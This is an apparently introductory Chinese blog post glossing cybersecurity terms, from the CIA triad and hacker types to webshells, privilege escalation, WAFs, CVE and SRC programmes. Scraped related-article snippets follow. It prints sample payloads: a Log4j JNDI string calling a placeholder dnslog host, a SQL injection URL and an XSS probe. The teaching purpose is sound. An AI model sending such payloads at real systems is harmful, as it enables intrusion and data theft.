Day1--什么是网络安全?网络安全常用术语

目录

1. 什么是网络安全?

信息系统(Information System)

信息系统安全三要素(CIA)

网络空间安全管理流程

网络安全管理

2. 网络安全的常用术语

3. 网络安全形势

4. 中国网络安全产业现状


1. 什么是网络安全?

        网络空间安全包括了国家安全、城市安全、经济安全、社会安全、生产安全、人身安全等在内的“大安全”。

信息系统(Information System)

        是由计算机硬件网络通信设备计算机软件信息资源信息用户规章制度组成的以处理信息流为目的的人机一体化系统。

信息系统安全三要素(CIA)

  • 保密性(Confidentiality)
  • 完整性(Integrity)
  • 可用性(Availability)

网络空间安全管理流程

  1. 确定网络信息安全管理对象
  2. 评估网络信息安全管理对象的价值
  3. 识别网络信息安全管理对象的威胁
  4. 识别网络信息安全管理对象的脆弱性
  5. 确定网络信息安全管理对象的风险级别
  6. 制定网络信息安全防范体系及防范措施实施和落实网络信息安全防范措施
  7. 运行/维护网络信息安全设备、配置

网络安全管理

  • 《中华人民共和国网络安全法》
  • 《Cybersecurity Law of the People's Republic of China》

2. 网络安全的常用术语

黑客(hacker)对计算机技术非常擅长的人,窃取数据、破坏计算机系统。
脚本小子刚刚入门安全行业,学习了一些技术,只会用现成的工具或者从网上复制代码。
白帽子

· 白帽子的目的是发现企业的漏洞并且上报给企业,帮助其解决风险问题。

· 360补天、漏洞盒子、CNVD、CNNVD

红帽黑客有正义感、爱国的黑客。利用技术维护国家网络安全,并且对外来的攻击进行反击。

漏洞(vulnerability)

· 漏洞指的是硬件、软件协议等等存在的安全缺陷

· https://www.cnnvd.org.cn/web/wz/bzxqByld.tag?id=3&mkid=3

POC

· Proof of Concept

· 能证明漏洞存在的代码

· 例:${jndi:ldap://xxxxxx.dnslog.cn/test}

EXP

· Exploit--利用

· 执行了这一段利用代码之后,就能够达到攻击的目的。

Payload(攻击载荷)

· SQL注入--http://localhost/sqli-labs/Less-3/?id=-1')union select 1.l.database()--+

· XSS--<script>alert(1)</script>

· log4j--${jndi:ldap://xxxxxx.dnslog.cn/test}

0day漏洞已经被发现了(还没有公开),官方还没有发布补丁或者修复方法的漏洞。【危害力很大】
1day

漏洞的POC和EXP已经被公开了,但是很多人还来不及修复这个叫做1day漏洞。 

Nday漏洞

指已经发布官方补丁的漏洞,并且时间已经过去很久的漏洞。

漏扫基于数据库对漏洞进行自动化扫描。
补丁(patch)漏洞的修复程序。
渗透(penetration)

黑客入侵了网站或者计算机系统,获取控制计算机权限的过程。

渗透测试

(penetration test)

用黑客入侵的方式对系统进行安全测试,目的是找出和修复安全漏洞,在这个过程中不会影响系统的正常运行,也不会破坏数据。

木马

(Trojan horse)

隐藏在计算机中的恶意程序。
病毒(Virus)恶意代码程序。
杀毒软件瑞星、江民、金山、国外的诺顿、卡巴斯基、McAfee、360
免杀绕过杀毒软件。
肉鸡已经被黑客获得的控制权限的机器,可能是个人电脑也可能是企业或者单位的服务器,通常情况下因为使用者不知道已经被入侵,所以黑客可以长期获得权限和控制。
抓鸡利用出现概率非常高的漏洞(比如log4j、永恒之蓝),使用自动化方式获取肉鸡的行为。
跳板机黑客为了防止被追溯和识别身份,一般不会用自己的电脑发起攻击,而是利用获取到的肉鸡来攻击其他目标,这个肉鸡就充当一个跳板的角色。
DDos

· Distributed Denial of Service

· 分布式拒绝服务攻击

· 发起大量恶意请求,导致正常用户无法访问。

后门(backdoor)黑客为了对主机进行长期的控制,在机器上种植一段程序或留下一个“入口”。

中间人攻击(MITM)

· Man-in-the-Middle Attack

· MITM攻击

· 运行中间服务器,拦截并篡改数据

网络钓鱼

钓鱼网站指的是冒充的网站,用来窃取用户的账号密码。
webshell

· shell是一种命令执行工具,可以对计算机进行控制。

· webshell就是asp、php、jsp之外的web代码文件,通过这些代码文件可以执行任意的命令,对计算机做任意的操作。

Getshell

· 获得命令执行环境的操作。

· Redis的持久化功能、MySQL的写文件功能,MySQL的日志记录功能、上传功能、数据备份功能、编辑器。

提权(Privilege Escalation)

· 权限提升

· 普通用户权限,把自己提升为管理员权限的擦欧总就叫做提权。

拿站指得到一个网站的最高权限,即得到后台和管理员名字和密码。
拖库(脱裤)托库指的是网站被入侵以后,黑客把全部的数据都导出,窃取到了数据文件。
撞库用获得的裤子去批量登录其他网站。
旁站入侵

入侵服务器的其他网站。

横向移动攻击者入侵一台服务器成功以后,基于内部网络,继续入侵同网段的其他机器。
代理(Proxy)帮我们发起网络请求的一台服务器。
VPN

· Virtual Peivate Network

· 代理

· 加密通信

· 办公--在家里连接到公司内网

蜜罐(Honeypot)吸引攻击者攻击的伪装系统,用来实现溯源和反制。
沙箱(Sandbox)

· 沙箱是一种按照安全策略限制程序行为的执行环境,就算又恶意代码,也只能影响沙箱环境而不会影响到操作系统。 (360安全浏览器--带沙箱功能)

· 微步在线云沙箱:https://s.threatbook.com/

靶场

· 模拟的有漏洞的环境

· 可以是网站、容器、操作系统

堡垒机

· 跳板机--jumpserver

· 运维审计系统--管理资源,审批、审计、访问控制、事件记录

WAF

· Web Application Firewall

· Web应用防火墙。

· 对HTTP/HTTPS的流量内容进行分析,拦截恶意攻击行为。

· WAF使用场景:例如服务器中有些安全性比较差的应用程序,审计和修改全部代码比较麻烦,这时候最好的办法就似乎通过部署WAF来实现安全防护。

· WAF可以防护的常见风险包括:SQL注入、XSS、利用本地/远程文件包含漏洞进行攻击、PHP代码注入、黑客扫描网站,源代码/错误信息泄露等等。

APT攻击

· Advanced Persistent Threat

· 高级可持续威胁攻击,指某组织在网络上对特定对象展开的持续有效的攻击活动。

· 2021深信服APT攻防趋势半年洞察。

护网国家组织牵头组织事业单位,国企单位,名企单位等开展攻防两方的网络安全演习。
CTF

CVE

· Common Vulnerabilities and Exposures--通用漏洞披露

· Mitre

· 例如:CVE-2021-4422/

· CVE Website

CNVD

· 国家信息安全漏洞共享平台--https://www.cnvd.org.cn/

· 国家计算机应激响应中心  CNCERT维护--国家互联网应急中心

 应急响应一个公司为了应对各种安全时间所做的准备和事后采取的措施。

SRC

· Security Response Center---企业的应急响应中心

· SRCs|安全应急响应中心 - 0xsafe

公益SRC

· 漏洞盒子 - 中国领先的漏洞平台与白帽社区|安全众测与安全运营服务平台

· 教育漏洞报告平台(EDUSRC)

网络空间测绘

· 网络空间资源收录

ATT&CK

· 风险分析模型--收集威胁情报,模拟APT攻击

逆向(Reverse)· 把程序还原为源代码,分析程序的运行过程
DevOps

· Development +Operations--安全开发与运维

· 开发测试运维一体化

CICD
等保

· 网络安全等级保护

· 要求相关行业单位和公司的信息系统必须进行定级,然后再公安机关备案,然后建设整改,然后由测评机构评级,并且持续维护和监督。

3. 网络安全形势

        FireEye网络威胁地图:

                https://www.fireeye.com/cyber-map/threat-map.html

        卡巴斯基实时威胁地图:

                地图 | 卡巴斯基网络威胁实时地图

        安全事件分类:GBZ20986-2007《信息安全技术 信息安全事件分类分级指南》

4. 中国网络安全产业现状

        安全产业:
                中国网络安全行业全景图(2020年3月第七版).pdf

                CCSIP 2021中国网络安全产业全景图第三版final.pdf

                2021年网络安全产业分析报告V1.020211011
                

                2021年网络安全产业态势总结

                        https://www.secrss.com/articles/38043

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/571067.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

使用IOPaint实现图片擦除路人

IOPaint 是一个免费的开源的 inpainting/outpainting 工具&#xff0c;由最先进的 AI 模型提供支持。 IOPaint 中使用各种模型来修改图像&#xff1a; 擦除&#xff1a;删除任何不需要的物体、缺陷、水印、人物。修复&#xff1a;对图像的特定部分进行修改、添加新对象或替换…

第二期书生浦语大模型训练营第四次笔记

大模型微调技术 大模型微调是一种通过在预训练模型的基础上&#xff0c;有针对性地微调部分参数以适应特定任务需求的方法。 微调预训练模型的方法 微调所有层&#xff1a;将预训练模型的所有层都参与微调&#xff0c;以适应新的任务。 微调顶层&#xff1a;只微调预训练模型…

ACL的知识点和实验

1.ACL的组成 ACL由若干条permit或deny语句组成。每条语句就是该ACL的一条规则&#xff0c;每条语句中的permit或deny就是与这条规则相对应的处理动作。 2.规则编号 &#xff08;1&#xff09;一个ACL中的每一条规则都有一个相应的编号。 &#xff08;2&#xff09;步长是系…

本地CPU搭建知识库大模型来体验学习Prompt Engineering/RAG/Agent/Text2sql

目录 1.环境 2.效果 3.概念解析 4.架构图 5. AI畅想 6.涉及到的技术方案 7. db-gpt的提示词 1.环境 基于一台16c 32G的纯CPU的机器来搭建 纯docker 打造 2.效果 3.概念解析 Prompt Engineering &#xff1a; 提示词工程 RAG&#xff1a; 检索增强生成&#xff1b; …

PDE求格林函数

求Green函数 通俗地解释拉普拉斯方程的基本解的意义 拉普拉斯方程的基本解是一个非常有用的数学概念&#xff0c;它帮助我们理解在某一个点施加一个非常小的影响&#xff08;比如一个微小的推动、热源或电荷&#xff09;时&#xff0c;这种影响是如何在整个空间中扩散和影响其…

业内PMP考试哪家机构通过率高?

选择培训机构时&#xff0c;通过率并不是唯一的标准。PMP培训机构避坑指南&#xff0c;如何选择可靠的机构&#xff1f;哪些是虚假误导&#xff1f;哪些是真正的优质培训机构&#xff1f; 20家业内PMP机构测评 干扰项总结(一)【各种虚假排行榜】 这个行业首先不存在官方的机构…

会议文字记录工具【钉钉闪记】

当开会时&#xff0c;需要文字记录会议内容&#xff0c;但是打字又慢&#xff0c;可以使用钉钉闪记。 钉钉工作台直接搜索-钉钉闪记

【注释和反射】类加载的过程

继上一篇博客【注释和反射】获取class类实例的方法-CSDN博客 目录 三、类加载的过程 例子 三、类加载的过程 在Java虚拟机&#xff08;JVM&#xff09;中&#xff0c;类加载是一个将类的字节码文件从文件系统或其他来源加载到JVM的内存中&#xff0c;并将其转换为类或接口的…

napi —— linux 网卡驱动收包机制

linux 操作系统一般指 linux 内核。在 linux 上开发应用的时候&#xff0c;可以使用 linux 提供的系统调用。linux 内核管理着机器上的硬件资源&#xff1a;内存&#xff0c;磁盘&#xff0c;网卡等。开发应用的时候不能直接操作这些硬件&#xff0c;而只能通过系统调用来使用…

初识C++ · 类和对象(中)(2)

前言&#xff1a;上篇文章已经介绍了6个默认成员函数中的3个函数&#xff0c;分别是构造函数&#xff0c;析构函数&#xff0c;拷贝构造函数&#xff0c;本文介绍的是后三个&#xff0c;赋值运算符重载&#xff0c;const成员函数&#xff0c;取地址操纵符重载。 目录​​​​​…

全世界IT人苦竞业久矣!美国FTC宣布全面废除员工竞业协议

2023 年 1 月&#xff0c;美国联邦贸易委员会&#xff08;FTC&#xff09;发布声明称&#xff0c;拟在全国范围禁止用人单位与雇员签订竞业禁止性条款。当地时间 4 月 23 日&#xff0c;FTC 宣布全面禁止所有员工&#xff08;包括高级管理人员&#xff09;签署新的竞业禁止协议…

Vue3+Echarts: 浏览器缩小后,图表内容发生重叠

一、问题 Vue3Echarts项目&#xff1a;浏览器缩小后&#xff0c;图表内容发生重叠。本文将提供几个解决上述问题的思路&#xff0c;后续有新的解决思路将在此处进行补充。 二、解决思路 1、动态调整ECharts配置 如果图表容器的尺寸没有随着浏览器窗口的缩小而进行相应地调整…

[Linux_IMX6ULL驱动开发]-设备树简述

目录 设备树的引入 设备树具体框架 设备树的属性 label address-cells和size-cells compatible model status reg 设备树的编译 内核对设备树的处理 plateform_device如何对应plateform_driver 设备树的引入 之前已经学习了解过了总线驱动模型的概念&#xff0c;也…

分类预测 | Matlab实现CNN-BiLSTM-SAM-Attention卷积双向长短期记忆神经网络融合空间注意力机制的数据分类预测

分类预测 | Matlab实现CNN-BiLSTM-SAM-Attention卷积双向长短期记忆神经网络融合空间注意力机制的数据分类预测 目录 分类预测 | Matlab实现CNN-BiLSTM-SAM-Attention卷积双向长短期记忆神经网络融合空间注意力机制的数据分类预测分类效果基本描述程序设计参考资料 分类效果 基…

excel相同行不同列查询

EXCEL中e列和f列是每一行对应的&#xff0c;我想在d列中找和e列一样的元素&#xff0c;然后获取同一行中f列的值 IFERROR(VLOOKUP(D1, E:F, 2, FALSE), "")

STC8H8K64U I2C主机模式相关寄存器

STC8H8K64U I2C主机模式相关寄存器 STC8H8K64U-TSSOP20 I2CCFG I2C配置寄存器 I2CMSCR I2C主机控制寄存器 I2CMSST I2C主机状态寄存器 I2CMSAUX I2C主机辅助控制寄存器 I2CTXD I2C数据发送寄存器 I2CRXD I2C数据接收寄存器 I2CCFG I2C配置寄存器 B7ENI2C ENI2C&#xff1a…

【电子元件】常用的二极管、极管规格参数一览表

目录 1. 常用的二极管规格参数1.1 贴片二极管1.2 直插二极管 2. 常用的三极管规格参数2.1 贴片三极管2.2 直插三极管 参考资料 1. 常用的二极管规格参数 1.1 贴片二极管 型号/封装丝印正向压降(Vf) 反向击穿电压(Vr)平均整流电流(Io)/正向工作电流(If)反向电流(Ir)反向恢复时间…

实验:使用apache + yum实现自制yum仓库

实验准备 Web服务器端&#xff1a;cenos-1&#xff08;IP&#xff1a;10.9.25.33&#xff09; 客户端&#xff1a;centos-2 保证两台机器网络畅通&#xff0c;原yum仓库可用&#xff0c;关闭防火墙和selinux Web服务器端 ①安装httpd并运行&#xff0c;设置开机自启动 安装…

2024五一萌趣嘉年华主题展活动策划案

2024五一国宝大作战 萌趣嘉年华熊猫滚滚来野主题展活动策划案-53P 活动策划信息&#xff1a; 方案页码&#xff1a;53页 文件格式&#xff1a;PPT 方案简介&#xff1a; 活动思路&#xff1a; 五一马上就要到了~再加上全民关注的对象--大熊猫&#xff01;&#xff01; 这…

Echarts异步数据与动画加载

目录 简介 头部代码 这段代码是使用 Echarts 绘制图表的关键部分。首先&#xff0c;初始化了一个 Echarts 实例。然后&#xff0c;通过 Ajax 请求获取数据&#xff0c;并基于此设置图表选项。其中包括颜色、背景色、标题、提示框、图例以及饼图的具体配置。 具体解释如下&a…